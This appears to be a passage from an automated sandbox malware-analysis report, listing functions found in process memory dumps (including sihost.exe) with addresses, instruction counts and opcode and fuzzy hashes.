Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c94e6a955eb6a1c9160dc645d1d41492acfa62ba0792f58b7195444aaa05a7
Instruction ID: 680a5887329a58c389e7c4d4a9cecdac6098a85f4d78421cf105fb06d5810c0f
Opcode Fuzzy Hash: 50c94e6a955eb6a1c9160dc645d1d41492acfa62ba0792f58b7195444aaa05a7
Instruction Fuzzy Hash: 8DE0D830709B844FC70EA62C886D560BBF1EF6711179A42EBC045CB2B3DA19DCC8C741

Function 00007FF848EBDAB9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2abc34493d6af6520ee033b10fcba4d4aa94749bfd6220db6eaf09b292394583
Instruction ID: 4896f2fe7312af2b91d43d15ae57f57d0b42bc9df57c2d04db3b3a43e8f8cf4e
Opcode Fuzzy Hash: 2abc34493d6af6520ee033b10fcba4d4aa94749bfd6220db6eaf09b292394583
Instruction Fuzzy Hash: B2E01A6194F7C44FC70B9B3488788503F60EF6721174A40EAC045CF1B3E66A8C49C711

Function 00007FF848EB79E9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5148f97d3910af3a4432de4c80144408d0396b2359837dc563e701cad942bf14
Instruction ID: a467ca8167748dc402e9e9eb1c9c7292e75d67aef55ea5c85bd8e5c14c34e3fd
Opcode Fuzzy Hash: 5148f97d3910af3a4432de4c80144408d0396b2359837dc563e701cad942bf14
Instruction Fuzzy Hash: 99E04F3294E7C08FC70BAB3488688507FB1EF6B61174A41EBC085CF5B3EA299C49C712

Function 00007FF848EBDA39 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2a3ff3c3ead2b4ae0574c8971da14f4b47481b44c27d1c22d358ab217ff475
Instruction ID: 3ba94996540c45a8d2632d49883830d934a2509d90c10762056d180e6d8eb580
Opcode Fuzzy Hash: 3a2a3ff3c3ead2b4ae0574c8971da14f4b47481b44c27d1c22d358ab217ff475
Instruction Fuzzy Hash: B4E01A3194E7C08FC74B9B3588B88543F60EE6721174A40EAC085CF1B3D629C849C712

Function 00007FF848E956A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c478d697799a5a7f24270fd86399c56b43d0334bb21ad7333c0f9bc131bbc2
Instruction ID: fbd205c4c6fa466b4190ced13a3d9760bbf06e5a8f173af33308e433405201f7
Opcode Fuzzy Hash: f7c478d697799a5a7f24270fd86399c56b43d0334bb21ad7333c0f9bc131bbc2
Instruction Fuzzy Hash: D4D05E30B60A0D4B8B4CB62D8458430B3D1F7AA60679452B8D40BC2281ED25ECC68B84

Function 00007FF848E93970 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FF848EBA5C0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848EBA650 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848E85035 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction ID: 68592a55a18af970df37fcd829d9fdd26ff0aed035459225bc8f91a1ff4bfe21
Opcode Fuzzy Hash: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction Fuzzy Hash: 3BE01A20E0C51A4FF7A4FA14C8503BD63A1FF85340F9040B8D80EA32D2CE396D81971A

Function 00007FF848E83FE3 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238954e285805b6cde683cffeed1411e80eebaf76d22ab711776178b63623c00
Instruction ID: cda17b4459f8bf19ae9cd4ec9409c10fe34551386b6cf0e45048889816505d0e
Opcode Fuzzy Hash: 238954e285805b6cde683cffeed1411e80eebaf76d22ab711776178b63623c00
Instruction Fuzzy Hash: C3E01711E6C9960EF29CB63C44223BC91C2BF88791F88407DE40EC32C3DE6E2C4402AA

Function 00007FF848E95260 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcc4869cb83e9771df72d27cc3db6c2254951a8da51c2bc8d1fcdd101037ecd
Instruction ID: e733343defcbd2143758239ba2cb9bb5c8d7e175abc9d27df1293c3cc3d99d96
Opcode Fuzzy Hash: bdcc4869cb83e9771df72d27cc3db6c2254951a8da51c2bc8d1fcdd101037ecd
Instruction Fuzzy Hash: 35D0C930A649084F8B4CBA2C885996072D1FB69216B9540A9E00AC72A1EA6AD889C745

Function 00007FF848E9400E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368a0095ee9abe81d48dcf9feab2d6f843da9c2644c6d62ebbc72087e0671853
Instruction ID: 0643d13c17f4077eeea04f196e8e6a61003121504c3e286dd9d5d754682ca954
Opcode Fuzzy Hash: 368a0095ee9abe81d48dcf9feab2d6f843da9c2644c6d62ebbc72087e0671853
Instruction Fuzzy Hash: F9E08C71D0C80E8FE758EA88C4442BC7AA0FF44248F14023AC00E82286DF3828824A80

Function 00007FF848EB1A60 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848EB6F90 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab106bac20a1d0d558619b546c096607ebf4bc0132dd2453390b54ac1aa9af0b
Instruction ID: 7059fa6a311b27f577d586d997f94bb7e485f1b2b316e9539fc935d5bbb76a99
Opcode Fuzzy Hash: ab106bac20a1d0d558619b546c096607ebf4bc0132dd2453390b54ac1aa9af0b
Instruction Fuzzy Hash: 6CD02230B508000FC70CBA388C588703390EB6A202B8000A8D00BC72B1DA2ADC88C740

Function 00007FF848EBB890 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3e7cbaab6c9951d57dcd1a87f18a55a0f1c18b8dcb396ec4019cbe5d343ac5
Instruction ID: e55bda727e1692d4ba5aea5ebcc5d1e8b3bfe32eaedb6b14496d0d32bf312493
Opcode Fuzzy Hash: cc3e7cbaab6c9951d57dcd1a87f18a55a0f1c18b8dcb396ec4019cbe5d343ac5
Instruction Fuzzy Hash: BDD01234B549044FC70CB63888598747391EB6A216B9550B9D00BD72B1DA6ADC89C781

Function 00007FF848E9457F Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b0104fbead0baf0710752d857b1eb15cf7d95b308d4dbc7bd2e6b15b31362d
Instruction ID: 620fa682b7f1d5fb519edf87d9e368065b461fb4a2d6204ee068a05b76de1050
Opcode Fuzzy Hash: d4b0104fbead0baf0710752d857b1eb15cf7d95b308d4dbc7bd2e6b15b31362d
Instruction Fuzzy Hash: D7D09E74D0C6078FF659FB4894506BD2261FF4438CF540475D85E836C7CF79A912D64A

Function 00007FF848E806AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction ID: 290d4972ad82d1bd7a4e6530cf5a06ac43456d44fc8a9f41a4f6b4b1606cbbf4
Opcode Fuzzy Hash: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction Fuzzy Hash: ECC08C00D0F91F08E440716E14020ACA2007FC42A0FE10032C01C42091DE7D20C6126E

Function 00007FF848E81310 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction ID: a68b7dab3807bbafa3e2affb65e23442acee59da3870891e66c8500f2ae23a87
Opcode Fuzzy Hash: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction Fuzzy Hash: 7BC04C345558098FC948FB29C88991877A0FF59215BD51090E409C7171E669DCD5D745

Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction ID: 96063e164c094c18a03444ecc5be57ba15123a5c93d8a5564aba012e595fc386
Opcode Fuzzy Hash: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction Fuzzy Hash: 7BB01200C5E40F04E40431BA08420AC70407FC4140FC10070D40C41081D9AD1095035A

Analysis Process: sihost.exePID: 7880, Parent PID: 1028COMMON

Executed Functions

Function 00007FF848E707B6 Relevance: 1.6, Instructions: 1608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb91fe6e4563c49acece5656da6fc00712111991e5d98b86120d64ffa59e6983
Instruction ID: 82c6a8c5ab07a46645dce23833049ef01b6a8755e1a24ee9252a4b643d5e4246
Opcode Fuzzy Hash: eb91fe6e4563c49acece5656da6fc00712111991e5d98b86120d64ffa59e6983
Instruction Fuzzy Hash: 46B28230E1C95A9FEB98FA2884556B973A2FF58780F5445B9D00DD32C7DE38BC828785

Function 00007FF848E713EA Relevance: 1.0, Instructions: 1026COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f362824dcab64f6be63fd1b779b07f01d890d397764ba583994316dc59926d
Instruction ID: 878a03dff355f7d1fa421e3d4fc4376eebc3dd47e493b8493a4e88397856895a
Opcode Fuzzy Hash: e3f362824dcab64f6be63fd1b779b07f01d890d397764ba583994316dc59926d
Instruction Fuzzy Hash: F0728331E1C95A9FEB98FA2884516B973A1FF58740F5445B9D00DC32C7DF38AC828B85

Function 00007FF848E90D65 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e90000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e6ccf029cd89312020e4c0afb749eb228408f3a7ee5caabc28f663c687a483
Instruction ID: 9def71dbc3917b378ba23dfa979f71d1bf4d0cc5fdb98ffce9c2a376f26f1e1f
Opcode Fuzzy Hash: 90e6ccf029cd89312020e4c0afb749eb228408f3a7ee5caabc28f663c687a483
Instruction Fuzzy Hash: 90D19A3182D79A0FE32D69694C420B47781FB43609F29537DCDEB831C7EA79A81782C9

Function 00007FF848E60D70 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4cb4c5863c38e9260ac5f7468e48b4b251083f24823258c8b6a78df8dcc83b
Instruction ID: 03183ba6a7561f274782488a6c33ced5f980bfa251123f554ac1b3598a89dcd6
Opcode Fuzzy Hash: cd4cb4c5863c38e9260ac5f7468e48b4b251083f24823258c8b6a78df8dcc83b
Instruction Fuzzy Hash: 2191D275D18A998FE789EB2C88593EABFF0FB9A351F4400BEC049E7292DB7914158710

Function 00007FF848E60B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FF848E60B56
"s9, xrefs: 00007FF848E60B46
!k9, xrefs: 00007FF848E60B4E

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 31d0b06b4d1969b856a058ac3edd199d739a0cd5d76fe7e3691b118520364b0c
Instruction ID: 5d5258ba7701fd2bc5c57b48a8010d4227e8934212b8484c97507578413e1ce6
Opcode Fuzzy Hash: 31d0b06b4d1969b856a058ac3edd199d739a0cd5d76fe7e3691b118520364b0c
Instruction Fuzzy Hash: 2C01F72A32D9568FC602B63EA4505D87B50EAC2135BC901F7D144CB191E3105C9EC3E0

Function 00007FF848E9A5A9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E9A5C6

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e90000_sihost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 479c78a0c65537fb5f3d72a4385fde152e36648f511b210aaaadcce97306e090
Instruction ID: 9c358dfa4d1d491dee8d4165978d7875f8c8a273d655f024df0565f867a0bfc8
Opcode Fuzzy Hash: 479c78a0c65537fb5f3d72a4385fde152e36648f511b210aaaadcce97306e090
Instruction Fuzzy Hash: B1F06D71A0E7C44FC71AAA3888694547FA0EF6721174A52EFC446CF1A7EA2DCC89C751

Function 00007FF848E919B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E919D6

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e90000_sihost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 3bfa71d24d82ab8dce55f299f9d4e8df319258e77f82a28418c6e36b1083192c
Instruction ID: 104c7bdf4e7c45c9266cd8431a48474802738d0a89d3345d69840e7ef7d4d3d0
Opcode Fuzzy Hash: 3bfa71d24d82ab8dce55f299f9d4e8df319258e77f82a28418c6e36b1083192c
Instruction Fuzzy Hash: 51E0927190E7C04FCB16EA348868454BFA0EF67201B4A55EFC086CF1E7EA2DC889C701

Function 00007FF848E70DCD Relevance: .8, Instructions: 755COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e5a77db12564c8d869140cf63ffc46a79a53722e71473ca2c973bf4141d0e4
Instruction ID: 4d6d7f06d2687dbc329ca13c751d40a7ab74e1d5adb835961edaf5b12bf186cf
Opcode Fuzzy Hash: 30e5a77db12564c8d869140cf63ffc46a79a53722e71473ca2c973bf4141d0e4
Instruction Fuzzy Hash: 94328F31E1C95A8FEB98FA2884556B973A2FF98380F5445B9D00DD32C7DF38AC428785

Function 00007FF848E9AD8C Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e90000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701b648803df713189d1dfa9288ee2a1e479643ccfded4ca083daa14b1f1ce18
Instruction ID: d93ed3e37215f01bbe78776e5a0d5b6efd7c33a1c6e7fb3afb2a850b8198b1af
Opcode Fuzzy Hash: 701b648803df713189d1dfa9288ee2a1e479643ccfded4ca083daa14b1f1ce18
Instruction Fuzzy Hash: 5F31D221E1DC4A4FEA94F6AC94966BA73D1FF58785F1440BAD00DC3283DE786C818345

Function 00007FF848E60908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction ID: ae9473942b9f4cd99d7bab87696a697ebdd573ff0ba58788f745b26d878f8d46
Opcode Fuzzy Hash: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction Fuzzy Hash: 0B21D83170CC184FD768EA1CE889DB973D1FB9932170501BAE58AC7126D921EC8287C5

Function 00007FF848E60998 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f95747f12bdea8ed41464b108411090c4f269f8631b876d27e2af0e9f78230
Instruction ID: b9b357d3cf973e678f97a32b3065c6843eac0f49742576bd540f12bcbaf8882f
Opcode Fuzzy Hash: d8f95747f12bdea8ed41464b108411090c4f269f8631b876d27e2af0e9f78230
Instruction Fuzzy Hash: 60312820B1CD195FE798B72C94496B976D2FF9D392F8400B9E44DC32D3DE29AC418785

Function 00007FF848E6472C Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1efd2528d02ee32652b2bdd72d0fb1b7ab4c31dee9d705dd4b398b5938d65e9
Instruction ID: 6c67a0f0cab8b733eee3973299b77352ee58d50c67870521ed4c191aa22857dd
Opcode Fuzzy Hash: f1efd2528d02ee32652b2bdd72d0fb1b7ab4c31dee9d705dd4b398b5938d65e9
Instruction Fuzzy Hash: 91315E20D1C51A4EEBA4F65894567B872D1FF59394F9001BAE80EF3292EF3878844A4A

Function 00007FF848E611A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c842dae45b9d45cc7185074a54b78b8ca98a409ba19213d22e5495d45fa391e
Instruction ID: 023747656b48c2fbdcbfc1eefd99100f3520c6c1df543a15b69f13ddb8b8d2c2
Opcode Fuzzy Hash: 5c842dae45b9d45cc7185074a54b78b8ca98a409ba19213d22e5495d45fa391e
Instruction Fuzzy Hash: 2D314F3190D69A8FDB46EB68C8589B97BF0FF5A340F4405BAD009E72A2DB39A940C751

Function 00007FF848E74369 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75bcaeaef63ec76dea02780878310005041480f9bd591dfbbc04dc48c7e7320e
Instruction ID: e2038d1a77d9c69f351db84fbbcf00f9a7ebdb12afa160f81a00643263566289
Opcode Fuzzy Hash: 75bcaeaef63ec76dea02780878310005041480f9bd591dfbbc04dc48c7e7320e
Instruction Fuzzy Hash: A6210231E0C6894FE752BA2848441B87BA0FF92354F5902F7C04CC70D2EE3C69468385

Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad6c172644c9fa413e29cdf3e7982abfaaf1be909ce209439aad44bea1eb2d8
Instruction ID: d86f65b276132a6782020215eb188049fc3b150b75a2ff790d7fba5f1db3a56c
Opcode Fuzzy Hash: 1ad6c172644c9fa413e29cdf3e7982abfaaf1be909ce209439aad44bea1eb2d8
Instruction Fuzzy Hash: 7821D13590D69AAFE712FB28C8452EC7FA0FF42361F5445BAC044FB1D2DB3829898755

Function 00007FF848E608F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction ID: ad54f8b196b71538dcd1682855679afe4567056aebd3c88d2da7cf4811f98e8f
Opcode Fuzzy Hash: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction Fuzzy Hash: 4C014C31B0D92C1FD658E01D540A93573C2E7CA6B0B951239D84FD3245CD61FC0342C4

Function 00007FF848E756FD Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

